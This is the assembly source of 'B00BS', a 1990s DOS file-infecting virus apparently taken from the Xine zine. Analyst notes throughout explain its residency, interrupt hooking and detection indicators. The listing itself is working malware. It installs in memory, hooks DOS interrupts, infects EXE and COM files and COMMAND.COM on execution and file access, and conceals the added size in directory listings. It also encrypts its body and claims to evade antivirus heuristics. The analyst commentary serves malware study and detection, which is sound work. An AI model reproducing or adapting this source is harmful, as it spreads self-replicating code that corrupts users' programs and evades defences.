; ---------------------------------------------------------------------------------------
; Analyst notes for the listing text that follows (line breaks of the original were lost;
; the text is kept as found).
; Contents: zine banner, author header, record layouts, size/flag constants and the
; entry stub up to the patched near JMP at YesVirus.
; - FileHeaderRecord is 14 words (28 bytes) laid over the first bytes of the host file.
;   In the standard MZ layout the field named `Checksum` falls at offset 18h
;   (relocation-table offset) and `checkOvr` at 1Ah (overlay number); the MZ checksum
;   word itself is the field named `check` (offset 12h).
; - AfterCryp: CALL / POP BP / SUB BP,3 leaves BP = run-time offset of START_TSR; the
;   stub then addresses its data as cs:[bp][...].
; - Residency probe: INT 2Fh with AX=FE01h; AL=FFh on return means a copy is resident
;   (HOOK_2F answers every AH=FEh call that way). The same probe works as a memory check.
; - YesVirus is opcode E9h followed by `jmp_addr`; FileInfect stores 0 there for EXE
;   hosts and the distance to com_exec for COM hosts.
; ---------------------------------------------------------------------------------------
/-----------------------------\ | Xine - issue #2 - Phile 029 | \-----------------------------/ ;****************************************************************************** ; THIS IS FOR EDUCATIONAL PURPOSE ONLY Gi0rGeTt0 ; ; Virus name : B00BS ; Author : Unknwon :) ; Group : iKx ; Origin : Italy 1996/97 ; Compiling : Use TASM ; TASM /M2 B00BS.ASM ; TLINK B00BS ; Targets : EXE COM ; Features : stealth via 11h,12h,4eh,4fh,disinfect and infect on the fly ; on opening(3dh,6c00h) and closing(3eh) ,int 24h handler ; TSR by MCB and int21h (48h) ; uses some 386 instructions for some routines (just for fun) ; fucks TBAV,AVP,F-PROT heuristic shits ; improvements : needs a poly engine ; payload : none ; Greetings : to all the guys of the iKx and all the ; other guys on #virus. ; ;****************************************************************************** ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; The file is a EXE .386 CSeg SEGMENT USE16 ASSUME cs:CSeg FileHeaderRecord struc signature dw ? sizemod dw ? msize dw ? relocat dw ? headsize dw ? minalloc dw ? maxalloc dw ? stackseg dw ? stackofs dw ? check dw ? ip dw ? codes dw ? Checksum dw ? checkOvr dw ? FileHeaderRecord ends SearchRecord struc date dw ? time dw ? SearchRecord ends ExecBlockRecord struc Env dw ? Cmd dd ? ExecBlockRecord ends Findrecord struc FindBuf db 128 dup (?) Findofs dw ? Findrecord ends VIR_PAR = ((END_TSR - START_TSR ) / 16) + 2 VIR_LEN = (REAL_CODE - START_TSR) + 1 ; size of the virus in memory VIR_TRUE_LEN = ( REAL_CODE - START_TSR ) + 1 ; size of the virus on file already = 0 ; already infected ready = 1 ; ready to be infected com = 2 ; com file exe = 3 ; exe file other = 4 ; other true = 1 false = 0 maxfiles = 26 ; max file no to open , must be (maxfiles*2)/4 integer START_TSR equ $ AfterCryp : call SH SH : pop bp sub bp,3 push ds pop es mov ax,0fe01h int 2fh cmp al,0ffh jne short Novirus YesVirus : db 0e9h jmp_addr dw ?
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: return-to-host paths, then NoVirus
; (memory installation).
; - EXE return: SS:SP and CS:IP are rebuilt from templateheader relative to PSP+10h,
;   the 32-bit registers are zeroed and RETF enters the host. COM return (com_exec):
;   the 4 saved bytes in @com_buf are copied back to offset 100h and RETF goes there.
; - NoVirus saves the environment segment (PSP:2Ch) in tmp_COMseg, switches the DOS
;   allocation strategy to last fit (AX=5801h, BL=2) and asks for VIR_PAR paragraphs
;   (AH=48h). If that fails it writes character 07h via AH=02h and splits the current
;   MCB by hand ('M' / size reduced by VIR_PAR / new trailing 'Z' block).
; - Memory artefact: the resulting MCB has owner word 0008h and the word 'CS' at MCB
;   offset 8 (presumably seen as "SC" in a memory dump, given TASM's byte order for
;   two-character constants; confirm on a sample).
; - INT 21h (0:84h) and INT 2Fh (0:0BCh) are swapped directly in the interrupt vector
;   table with XCHG; the previous vectors go to TRAPPED_21 / TRAPPED_2F. No AH=25h/35h
;   call is made, so the hook is only visible by inspecting the table itself.
; - sleep=FALSE, command_flag=TRUE and COMseg=environment segment are set in the
;   resident copy before control returns to yesvirus.
; ---------------------------------------------------------------------------------------
mov ax,ds ; ES = DS = PSP = AX add ax,10h ; PSP + 1 paragraph mov bx,cs:[bp][templateheader.stackseg] add bx,ax cli mov ss,bx mov sp,cs:[bp][templateheader.stackofs] sti mov bx,cs:[bp][templateheader.codes] add bx,ax push bx ; push CS push cs:[bp][templateheader.ip] ; push IP @jump : xor eax,eax xor ebx,ebx xor ecx,ecx xor edx,edx xor esi,esi xor edi,edi xor ebp,ebp retf ; jmp to host CS:IP com_exec : push cs ; COM settings mov si,bp add si,offset @com_buf mov di,100h push di cld movsd jmp short @jump NoVirus : mov es,word ptr ds:[2ch] ; enviroment segment mov word ptr cs:[bp][tmp_COMseg],es push ds mov ax,ds ; DS = PSP dec ax ; AX = MCB mov ds,ax mov bl,02h ; last fit mov ax,5801h int 21h ; set mov bx,VIR_PAR ; malloc mov ah,48h int 21h jnc short malloc ; problems ? push ax dx mov ah,2 mov dl,7 int 21h pop dx ax push ds pop ax mov bx,4d03h mov ds:[0],bh ;'M' xor bh,bh sub word ptr ds:[bx],VIR_PAR inc ax add ax,ds:[bx] mov ds,ax mov word ptr ds:[bx],VIR_PAR-1 mov bl,'Z' mov ds:[0],bl ; Z in last MCB inc ax malloc : mov es,ax dec ax push ax pop ds mov bx,8 mov ds:[1],bx ; owned by dos 0008 mov word ptr ds:[bx],'CS' xor bl,bl ; restore strategy mov ax,5801h int 21h cld xor di,di mov si,bp push cs pop ds mov cx,(VIR_LEN / 4) + 1 rep movsd call clean_x_stack cli xor ax,ax mov ds,ax mov eax,es shl eax,16 mov ax,offset HOOK_21 xchg ds:[84h],eax mov es:TRAPPED_21,eax mov eax,es shl eax,16 mov ax,offset HOOK_2F xchg ds:[0bch],eax mov es:TRAPPED_2F,eax pop ds ; DS = PSP mov es:sleep,FALSE mov es:command_Flag,TRUE mov ax,cs:[bp][tmp_COMseg] mov es:COMseg,ax push ds pop es sti jmp yesvirus tmp_COMseg dw ?
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: the two resident interrupt handlers.
; - HOOK_2F: any request with AH=FEh returns AL=FFh (the answer the entry stub's
;   AX=FE01h probe looks for). AX=1605h sets `sleep`, AX=1606h clears it; while `sleep`
;   is TRUE, HOOK_21 passes every call straight through. The author's comment ties this
;   to Windows 3.11 start-up and the Windows 95 DOS prompt.
; - pass2f and org_21 are opcode EAh (far JMP) followed by TRAPPED_2F / TRAPPED_21, so
;   the saved original vector is the operand of the jump instruction itself.
; - HOOK_21: while command_flag is TRUE it first calls @COMM_COM (which clears the
;   flag), then dispatches. Function numbers are read from the intr_sub_w / intr_sub_b
;   tables instead of appearing as immediates in the compare instructions; the trailing
;   comments give the values.
; - Intercepted INT 21h functions: 4B00h, 4B01h, 1Ah, 4Eh, 4Fh, 3Dh, 3Eh, 6C00h, 11h, 12h.
; ---------------------------------------------------------------------------------------
HOOK_2F : cmp ah,0feh jne short ChkintWin mov al,0ffh iret ;///// Chkintwin and ChkEndwin disable the virus during installation check in ; win311 and under Msdos prompt in w95 ///// ; Under Msdos prompt only some int21h trap worked :(( i.e 4b ; but 3dh,3eh and some other as all long filenames functions didn't work ; i dunno the reason since i hadn't much time for solving the question ; if someone can explain it let me know pleaze :) ChkintWin : cmp ax,1605h jne short chkendwin mov cs:sleep,TRUE jmp short pass2f ChkEndWin : cmp ax,1606h jne short pass2f mov cs:sleep,FALSE pass2f : db 0eah TRAPPED_2F dd ? HOOK_21 : cmp cs:command_flag,TRUE jne short Check_int call @COMM_COM Check_int : cmp cs:sleep,TRUE je short org_21 cmp ax,cs:[intr_sub_w] ;4b00h je @EXEC00 cmp ax,cs:[intr_sub_w+2] ;4b01h je @LD&EX cmp ah,cs:[intr_sub_b] ;1ah je @SAVEDTA cmp ah,cs:[intr_sub_b+1] ;4eh je @FINDFIRST cmp ah,cs:[intr_sub_b+2] ;4fh je @FINDNEXT cmp ah,cs:[intr_sub_b+3] ;3dh je @OPEN cmp ah,cs:[intr_sub_b+4] ;3eh je @CLOSE cmp ax,cs:[intr_sub_w+4] ;6c00h je @EXTOPEN cmp ah,cs:[intr_sub_b+5] ;11h je @FCB_FIND cmp ah,cs:[intr_sub_b+6] ;12h je @FCB_FIND org_21 : db 0eah TRAPPED_21 dd ?
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: @COMM_COM, @EXEC00, @LD&EX and the first
; part of @OPEN (which continues in the next stretch of the listing).
; - @COMM_COM scans the saved environment segment (COMseg) for the dwords 'SMOC' then
;   '=CEP' (presumably the string "COMSPEC=" in memory order), copies the value that
;   follows into Data_Buffer and runs GetFattrib / openfile / FileInfect / closefile /
;   SetFattrib on that path. It always clears command_flag on exit, so it runs once.
; - @EXEC00 (AX=4B00h): if CheckIfExe accepts the name, the file is processed by
;   FileInfect before the original INT 21h call is made.
; - @LD&EX (AX=4B01h): FileClean is applied before the original call and FileInfect
;   after it, so the image handed back by the load is built from the restored file.
; - @OPEN (AH=3Dh): names accepted by CheckIfExe get FileClean before the real open;
;   a successful handle is recorded with PushHandle. When the real open fails with
;   AL=5, the file is passed to FileInfect again.
; - Every file operation is bracketed by vir_handler / dos_handler, which swap the
;   INT 24h vector.
; ---------------------------------------------------------------------------------------
@COMM_COM : pushad push ds es cld mov ax,cs:COMseg mov es,ax xor di,di mov cx,256 @pre_loop : mov eax,'SMOC' @loop_a : scasd jz short @nxt_ck sub di,3 loop @loop_a jmp @fail @nxt_ck : mov eax,'=CEP' scasd jz short @it_is sub di,3 jmp short @pre_loop @it_is : push es pop ds mov si,di push cs pop es mov di,offset Data_Buffer mov cx,256 @loop_b : lodsb or al,al jz short @copy_end stosb loop @loop_b @copy_end : stosb push cs pop ds mov dx,offset Data_Buffer ; DS:DX command.com path mov bx,dx call GetFattrib ; CX = attribute jc short @fail push cx dx ds call openfile ; BX handle call FileInfect call closefile pop ds dx cx call SetFattrib @fail : pop es ds popad mov cs:command_flag,FALSE ret @EXEC00 : call CheckIfExe jnz org_21 pushad push es ds ; DS:DX ASCIZ filename call vir_handler call getFattrib jc short @no_inf ; CX = attribute push cx ds dx call openfile call FileInfect call closefile pop dx ds cx call SetFattrib @no_inf : call dos_handler pop ds es popad call int21h jmp Intret @LD&EX : push es ds pushad call vir_handler call GetFattrib jc short ex_ld ; CX = attribute push cx dx ds call OpenFile jc short ex_ld call FileClean call closefile pop ds dx cx call SetFattrib ex_ld : call dos_handler popad pop ds es push ds dx call int21h pop dx ds pushf push es ds pushad call vir_handler call GetFattrib jc short not_ld ; CX attrib push cx ds dx call OpenFile call FileInfect call closefile pop dx ds cx call SetFattrib not_ld : call dos_handler popad pop ds es popf jmp Intret @OPEN : call CheckIfExe jnz org_21 push es ds pushad call vir_handler call GetFattrib jc short Skip_file ; CX attrib push cx ds dx call OpenFile call FileClean call CloseFile pop dx ds cx call SetFattrib call dos_handler popad pop ds es push ds dx call int21h pop dx ds jc short @no_open xchg ax,bx call PushHandle xchg bx,ax jmp Intret @no_open : pushf cmp al,5 jne short @no_mat push es ds pushad call vir_handler call GetFattrib jc short @a push cx ds dx call OpenFile call FileInfect call CloseFile pop dx ds
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: tail of @OPEN, then @EXTOPEN, @CLOSE,
; @FINDFIRST / @FINDNEXT and most of FindProc.
; - @EXTOPEN (AX=6C00h) mirrors @OPEN with the name taken from DS:SI.
; - @CLOSE (AH=3Eh) acts only on handles recorded by PushHandle. It resolves the
;   handle through INT 2Fh AX=1220h and AX=1216h, writes 2 to byte 2 of the returned
;   table entry (open mode in the usual DOS SFT layout; version dependent) and calls
;   FileInfect on the handle before the real close.
; - @FINDFIRST (AH=4Eh) expands the search spec with AH=60h into FindVar and records
;   in FindVar.Findofs where the file-name part starts.
; - FindProc (after a successful 4Eh/4Fh) rebuilds the full path from the name at
;   DTA+1Eh, opens the file and runs CheckXinf. For a file classified `already`, the
;   dword at DTA+1Ah (reported size) is reduced by vir_true_len-1, so directory
;   listings taken while the code is resident show the pre-infection size.
; - Detection consequence: sizes from a resident system and sizes read from clean
;   boot media differ by exactly vir_true_len-1 bytes for affected files.
; ---------------------------------------------------------------------------------------
cx call SetFattrib call dos_handler @a : popad pop ds es @no_mat : popf jmp Intret Skip_file : popad pop ds es call dos_handler jmp org_21 @EXTOPEN : xchg si,dx call CheckIfExe xchg dx,si jnz org_21 push es ds pushad call vir_handler mov dx,si call GetFattrib jc short @aa push cx ds dx call OpenFile call FileClean call closefile pop dx ds cx call SetFattrib @aa : call dos_handler popad pop ds es push ds si call int21h pop dx ds jc @no_open xchg ax,bx call PushHandle ; save handle xchg bx,ax jmp Intret ; // SFT and JFT didn't work in Msdos Prompt :(( // @CLOSE : call Pophandle jc org_21 call vir_handler pushad push ds es push bx mov ax,1220h ; BX handle call int2fh ; ES:DI JFT xor bx,bx mov bl,byte ptr es:[di] mov ax,1216h ; bx entry number for call int2fh ; ES:DI SFT mov byte ptr es:[di+2],2 pop bx call FileInfect pop es ds popad call int21h ; exec int call dos_handler clc jmp Intret @FINDFIRST : push ax cx si di es ; DS:DX find filename pushf mov si,dx push cs pop es mov di,offset findvar cld push di xor ax,ax mov cx,(size Findvar - 2) / 2 rep stosw ; reset Findvar pop di mov ah,60h ; DS:SI filename call Int21h ; ES:DI canonaized mov di,offset findvar + size findvar - 2 mov cx,size findvar - 2 - 1 std mov al,'\' repnz scasb jz short o sub di,3 o : add di,2 mov cs:Findvar.Findofs,di popf pop es di si cx ax @FINDNEXT : call int21h jc Intret FindProc : pushad push ds es pushf mov ds,cs:DTAseg mov si,cs:DTAofs add si,1eh ; DS:SI points to the ; filename in the DTA push cs pop es mov di,cs:findvar.findofs ; ES:DI path filename cld CopyName: movsb cmp byte ptr ds:[si],0 jne short CopyNAme mov byte ptr es:[di],0 ; Findvar now has the ASCIZ filename to pass to Openfile push cs pop ds mov dx,offset Findvar call CheckIfExe jnz short DonotTreat call OpenFile jc short DoNotTreat call CheckXinf cmp file_type,other je short CanClose cmp file_status,already jne short CanClose mov es,DTAseg mov di,DTAofs sub dword ptr es:[di+1ah],vir_true_len - 1 CanClose : call CloseFile DoNotTreat:
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: end of FindProc, @SAVEDTA and the first
; part of @FCB_FIND (continues in the next stretch of the listing).
; - @SAVEDTA (AH=1Ah) only records the caller's DTA address (DTAofs / DTAseg) and
;   passes the call on; the find handlers rely on this recorded address.
; - @FCB_FIND (AH=11h/12h) runs the original call first, then reads the DTA. A first
;   byte of 0FFh is treated as an extended FCB and the pointer is advanced by 7.
; - The path is rebuilt in FindVar from the drive byte in the DTA and the current
;   directory (AH=47h): drive letter, ':', '\', directory, then the 8.3 name taken
;   from the entry (blank padding of the name part stops the copy, '.' is inserted).
; ---------------------------------------------------------------------------------------
popf pop es ds popad jmp Intret @SAVEDTA : mov cs:DTAofs,dx mov cs:DTAseg,ds jmp org_21 @FCB_FIND : call int21h pushf push es ax bx les bx,dword ptr cs:DTAofs mov al,byte ptr es:[bx] cmp al,0ffh ; check for an extended FCB jne short @ok_good add bx,7 @ok_good : pusha push ds es mov ah,47h ; get cur dir mov dl,byte ptr es:[bx] ; drive number push cs pop ds mov si,offset FindVar call int21h ; return ASCIZ directory push cs pop es cld cmp byte ptr ds:[si],0 ; root ? jne short @path mov ax,offset FindVar add ax,3 mov cs:FindVar.FindOfs,ax jmp short @root @path : mov di,offset FindVar xor al,al @@f : scasb ; look for the end of the dirname jnz short @@f mov si,di dec si mov byte ptr es:[si],'\' add di,3 mov es:FindVar.FindOfs,di dec di std @cp : movsb cmp si,offset FindVar jae short @cp @root : mov word ptr es:[offset FindVar+1],'\:' add dl,'A' - 1 mov byte ptr es:[offset FindVar],dl ; drive letter pop es ds popa pusha push ds es ; ES:BX DTA push es pop ds ; DS = ES mov si,1 add si,bx ; file name ds:si push cs pop es mov di,cs:FindVar.FindOfs mov cx,8 cld @lp1 : lodsb cmp al,20h je short @end_1 stosb loop @lp1 @end_1 : mov al,'.'
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: end of @FCB_FIND, Intret, the call-through
; wrappers, the INT 24h swap and the small file helpers.
; - @FCB_FIND: for a file classified `already` by CheckXinf, the dword at offset 1Dh
;   of the FCB-style DTA entry (file size) is reduced by VIR_TRUE_LEN-1.
; - Intret copies the current flags over the FLAGS word of the interrupt frame and
;   then IRETs, so the caller sees the flags produced by the handler.
; - int21h / int2fh call the saved original vectors (PUSHF + far CALL), so the
;   handler's own DOS calls do not pass through HOOK_21 / HOOK_2F again.
; - vir_handler points INT 24h (0:90h) at `critical`, which returns AL=0; dos_handler
;   restores the previous vector. The saved vector TRAPPED_24 is the 32-bit immediate
;   of a hand-encoded instruction (66h C7h 06h 90h 00h imm32) inside dos_handler, i.e.
;   the resident code patches its own instruction bytes.
; - DOS function numbers are assembled in steps (e.g. MOV AH,3Dh / XOR AL,AL / ADD AL,2)
;   with the intended value kept in the comments; byte patterns keyed to the
;   immediate form of these loads will not match this code.
; - GetFAttrib returns the original attributes in CX (carry on error) and sets the
;   file's attributes to 32 (archive only); SetFattrib writes CX back. SetFattrib is
;   declared inside the GetFAttrib proc/endp pair.
; - Filestart has no RET and falls through into FileSeek.
; ---------------------------------------------------------------------------------------
stosb mov cx,3 mov si,9 add si,bx rep movsb xor al,al stosb ; Z terminated push cs pop ds mov dx, offset FindVar ; ASCIZ filename mov bp,bx call CheckIfExe jnz short @not_op call OpenFile jc short @not_op call CheckXinf cmp file_type,other je short @CanClose cmp file_status,already jne short @CanClose mov es,cs:DTAseg sub dword ptr es:[bp+1dh],VIR_TRUE_LEN - 1 ; real size @CanClose : call CloseFile @not_op : pop es ds popa @NotInf : pop bx ax es popf Intret proc cli push ax pushf pop ax add sp,8 push ax sub sp,6 pop ax sti iret Intret endp int21h proc pushf call dword ptr cs:TRAPPED_21 ret int21h endp int2fh proc pushf call dword ptr cs:TRAPPED_2F ret int2fh endp vir_handler proc cli push eax ds xor ax,ax mov ds,ax mov eax,cs shl eax,16 mov ax,offset critical xchg ds:[90h],eax mov cs:TRAPPED_24,eax pop ds eax sti ret vir_handler endp dos_handler proc push ds ax cli xor ax,ax mov ds,ax db 66h dw 06c7h dw 0090h TRAPPED_24 dd ? ; mov ds:[90h],cs:TRAPPED_24 pop ax ds sti ret dos_handler endp critical proc xor al,al iret critical endp openfile proc mov ah,3dh xor al,al add al,2 ; mov ax,3d02h call int21h mov bx,ax ret ; out : BX handle openFile endp closeFile proc mov ah,3eh ; in : BX handle call int21h ret closefile endp GetFAttrib proc push ax mov ah,43h xor al,al ; mov ax,4300h push ax call int21h ; CX = attribute pop ax inc al push cx ; mov ax,4301h push ax call int21h pop ax jc short out_f ; mov ax,4301h mov cx,32 call int21h out_f : pop cx pop ax ; returns CX = attribute ret ; returns carry on error SetFattrib proc push ax ; in : CX = attribute mov ah,43h xor al,al inc al ; mov ax,4301h call int21h pop ax ret SetFattrib endp GetFAttrib endp FileEnd proc mov ah,42h xor al,al add al,2 ; mov ax,4202h xor cx,cx xor dx,dx call int21h ; DX:AX file size ret FileEnd endp Filestart proc xor cx,cx xor dx,dx Filestart endp FileSeek proc mov ax,4200h call int21h ret FileSeek endp blockread proc mov ah,3fh call int21h ret blockread endp blockwrite proc mov ah,40h call int21h ret
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: timestamp helpers, commit, handle list and
; the extension filter (PopHandle continues in the next stretch of the listing).
; - GetDateTime / SetDateTime (AX=5700h / 5701h) save and re-apply the file's date and
;   time around a modification, so the last-write stamp of a changed file stays as it
;   was; timestamps are therefore not a usable change indicator here.
; - commit_file issues AH=68h on the handle.
; - clean_x_stack zero-fills SearchStack through ES:DI; the segment is whatever ES
;   holds at the call site.
; - CheckIfExe returns ZF=1 when the four characters before the terminating NUL are
;   '.exe', '.EXE', '.com' or '.COM'; mixed-case spellings are not matched.
; - PushHandle stores BX in the first zero slot of SearchStack (maxfiles entries) and
;   silently does nothing when no slot is free. PopHandle looks BX up in that list.
; ---------------------------------------------------------------------------------------
blockwrite endp GetDateTime proc mov ah,57h xor al,al ; mov ax,5700h call Int21h mov cs:searchrec.date,dx mov cs:searchrec.time,cx ret GetdateTime endp SetDateTime proc mov dx,cs:searchrec.date mov cx,cs:searchrec.time mov ah,57h xor al,al inc al ; mov ax,5701h call Int21h ret SetdateTime endp commit_file proc mov ah,68h call int21h ; commit file ret commit_file endp clean_x_stack proc mov di,offset searchstack mov cx, (size searchstack) / 4 xor eax,eax rep stosd ret clean_x_stack endp CheckIfExe proc ; DS:DX filename push es di ax push ds pop es cld mov di,dx ; ES:DI filename xor ax,ax FindZ : scasb jnz short FindZ cmp dword ptr [di-5],'exe.' je short is_exe cmp dword ptr [di-5],'EXE.' je short is_exe cmp dword ptr [di-5],'moc.' je short is_exe cmp dword ptr [di-5],'MOC.' is_exe : pop ax di es ret CheckIfExe endp PushHandle proc pushf push ax cx es di push cs pop es mov di,offset SearchStack ; ES:DI SearchStack cld mov cx,maxfiles xor ax,ax repnz scasw jnz short Nofree mov word ptr es:[di-2],bx ; sets handle Nofree: pop di es cx ax popf ret PushHandle endp PopHandle proc push ax cx es di or bx,bx jz short Nofree1 ; BX = 0 ?
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: end of PopHandle, Calc_check, CheckXinf and
; the first instructions of FileInfect.
; - PopHandle clears the matching SearchStack slot and returns CF=0; CF=1 when BX is 0
;   or not in the list.
; - Calc_check returns in DX the 16-bit sum of the header words at offsets 02h..18h
;   (SI runs from size-4 = 18h down to 2; offset 0 and offset 1Ah are not included).
; - CheckXinf classifies the open file into file_type / file_status:
;     * Signature word equal to MZsig-1 or ZMsig-1 -> EXE; anything else -> COM.
;     * COM marker: the word at file offset 1 equals
;       filesize - (VIR_TRUE_LEN-1) + (NONCRYPTED-START_TSR) - 3. Byte 0 is not checked.
;     * EXE with the word at 18h equal to 40h is set to `other` (author: PE/NE/LE).
;     * EXE marker: word at 1Ah (checkOvr) equals the Calc_check sum. This is a
;       file-level indicator that can be tested from the 28-byte header alone; it can
;       also occur by coincidence, so confirm with the appended body.
;     * An unmarked EXE is `ready` only if the size computed from msize/sizemod equals
;       the real file size, or if the name at offset 20h of the handle's table entry
;       reads 'COMMAND CO...' (author's note: COMMAND.COM under DOS 7 is an EXE);
;       otherwise it is `other`.
; - CheckXinf always finishes with FileEnd, leaving DX:AX = file size for the caller.
; ---------------------------------------------------------------------------------------
push cs pop es cld mov di,offset SearchStack mov cx,maxfiles mov ax,bx repnz scasw jnz short Nofree1 mov word ptr es:[di-2],0 ; free handle clc jmp short exitpop Nofree1 : stc Exitpop : pop di es cx ax ret PopHandle endp Calc_check proc push si ; DS = CS xor dx,dx mov si,size fileheader - 4 @chk : add dx,[si+offset fileheader] sub si,2 jnz short @chk pop si ; DX = checksum ret Calc_check endp CheckXinf proc mov file_status,already call Filestart mov cx,size Fileheader mov dx, offset Fileheader call BlockRead mov cx,cs:[MZsig] dec cx cmp fileheader.signature,cx je short IsanExe mov cx,cs:[ZMsig] dec cx cmp fileheader.signature,cx ; check whether it is an EXE file je short IsanExe mov file_type,com call FileEnd ; DX:AX = file size sub ax,VIR_TRUE_LEN - 1 add ax,NONCRYPTED - START_TSR sub ax,3 cmp ax,word ptr fileheader.signature+1 je GotoEnd ; infected jmp Except IsAnExe : mov file_type,exe cmp fileheader.Checksum,40h jne short @good ; not a PE,NE,LE .... mov file_type,other jmp GotoEnd @good : call calc_check cmp dx,fileheader.CheckOvr je GoToEnd ; already infected Cont : call FileEnd ; DX:AX = file size shl edx,16 mov dx,ax movzx edi,fileheader.msize movzx esi,fileheader.sizemod dec edi imul edi,512 add edi,esi cmp edi,edx ; malloc = filesize je short Except ;//**** SFT and JFT doesnt work in dos7 prompt from w95 :(( ****** /// ;//**** This is used for infecting COMMAND.COM under dos7 which is not a .COM ;//**** file but a real EXE Chk_Com : push bx es mov ax,1220h ; BX handle call int2fh ; ES:DI JFT xor bx,bx mov bl,byte ptr es:[di] mov ax,1216h ; bx entry number for call int2fh ; ES:DI SFT cld add di,20h ; go to filename mov eax,'MMOC' scasd jnz short no_com_com mov eax,' DNA' scasd jnz short no_com_com mov ax,'OC' scasw no_com_com : pop es bx jz short except mov file_type,other jmp short GotoEnd except : mov file_status,ready GoToEnd : call FileEnd ret ; DX:AX = file size CheckXinf endp FileInfect proc push cs cs pop ds es call CheckXInf ; DX:AX = file size cmp
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: body of FileInfect and the first part of
; FileClean (continues in the next stretch of the listing).
; - Size gate: files of 23000 bytes or less are left alone, as are files whose size
;   has a high word above 7.
; - Before the header is changed, the first 4 bytes go to @com_buf and header words
;   from offset 2 onward go to templateheader. Both buffers sit after NONCRYPTED, so
;   they are written to the host unencrypted: the final 4+28 bytes of a modified file
;   hold the original first 4 bytes and the original header fields (signature word
;   excepted). FileClean uses exactly this copy, and so can a repair tool.
; - EXE hosts: msize/sizemod, CS:IP and SS are recomputed, stackofs is raised by
;   (VIR_PAR+4)*16, the Calc_check sum is stored in checkOvr (offset 1Ah) and the
;   28-byte header is rewritten.
; - COM hosts: the first 3 bytes become E9h plus a displacement computed from f_size.
; - The body is then written at end of file: always VIR_TRUE_LEN-1 bytes taken from
;   Data_Buffer after Criptate. The original date/time is re-applied (SetDateTime)
;   and the handle is committed.
; - File growth is therefore constant, which gives a simple size-delta check against
;   known-good copies.
; ---------------------------------------------------------------------------------------
file_type,other je Infectexit cmp file_status,ready jne infectexit cld mov word ptr f_size,ax ; save size for .COM mov si,offset fileheader mov di,offset @com_buf movsd cmp dx,0 ja short @not_less cmp ax,23000 ja short @not_less jmp infectexit @not_less : cmp dx,7 ja Infectexit cld mov si,offset fileheader + 2 mov di,offset templateheader + 2 mov cx,(size fileheader) / 2 - 1 rep movsw push ax dx add ax,VIR_TRUE_LEN adc dx,0 mov cx,512 div cx inc ax ; AX = quotient DX=remainder mov fileheader.msize,ax ; new memory size mov fileheader.sizemod,dx ; new memory module pop dx ax add ax,NONCRYPTED - START_TSR adc dx,0 mov cx,16 div cx ; AX:DX = CS:IP mov fileheader.ip,dx push ax xor dx,dx mov ax,VIR_TRUE_LEN add ax,cx add fileheader.ip,ax mov cx,16 div cx sub fileheader.ip,dx mov dx,fileheader.ip dec dx mov first_addr,dx sub dx,NONCRYPTED - START_TSR mov cmp_addr,dx mov dx,ax pop ax sub ax,dx sub ax,fileheader.headsize mov fileheader.codes,ax ; set the new CS:IP mov fileheader.stackseg,ax add fileheader.stackofs,(VIR_PAR + 4) * 16 ; leave a safety margin call GetDateTime call calc_check ; dx checksum mov fileheader.checkovr,dx LeaveSo : call FileStart cmp file_type,com jne @exe1 mov jmp_addr,offset com_exec - offset yesvirus - 3 mov byte ptr fileheader,0e9h mov cx,f_size add cx,NONCRYPTED - START_TSR sub cx,3 mov word ptr fileheader+1,cx add cx,102h mov first_addr,cx sub cx,NONCRYPTED - START_TSR mov cmp_addr,cx mov dx,offset FIleheader mov cx,3 call BlockWrite jmp short ordinary @exe1 : mov jmp_addr,0 mov dx,offset Fileheader mov cx,size fileheader call BlockWrite ; write header ordinary : call FileEnd call Criptate ; return CX = ; virus lenght mov dx,offset Data_Buffer mov cx,VIR_TRUE_LEN - 1 call BlockWrite call SetDateTime call commit_file InfectExit : ret FileInfect endp FileClean proc push cs pop ds call CheckXInf ; DX:AX = file size cmp file_type,other je clean_out cmp file_status,already jne clean_out sub ax,size templateheader + 4 ;size @com_buf sbb dx,0 mov cx,dx
; ---------------------------------------------------------------------------------------
; Analyst notes for the text that follows: rest of FileClean, Criptate, its tables,
; the text string, the dispatch tables and the decryptor stub.
; - FileClean reads the last (size templateheader + 4) bytes of the file into
;   @com_buf/templateheader, writes back either the 4 original bytes (COM) or the
;   saved header with the signature reset to MZsig-1 (EXE), then seeks to
;   size-(vir_true_len-1) and issues a zero-length write, which truncates the file
;   there. The saved date/time is re-applied.
; - Criptate: the key is the low byte of the BIOS tick count at 0:46Ch; bits 0-1 of
;   the same word select xor / add / sub (value 3 maps back to xor). One byte
;   operation with one 8-bit key is applied to offsets 0..NONCRYPTED-1; the operation
;   opcode and key are patched into the loop at cripmode / k_code before it runs.
; - The bytes from @uncr_code up to REAL_CODE are copied without encryption. The stub
;   is constant apart from first_addr, uncripmode, k1_code and cmp_addr, and it
;   contains the fixed `mov cx,4000` / inc si / dec si / loop delay (author's comment:
;   aimed at AVP). The author's header lists the lack of a polymorphic engine as a
;   limitation, so the stub is a stable scan target.
; - `Message` lies before NONCRYPTED: it is encrypted in files on disk but present in
;   clear in the resident copy, so it is a memory indicator, not a file indicator.
; - MZsig / ZMsig are stored +1 and decremented before use, so the literal header
;   signature words do not appear in the body.
; ---------------------------------------------------------------------------------------
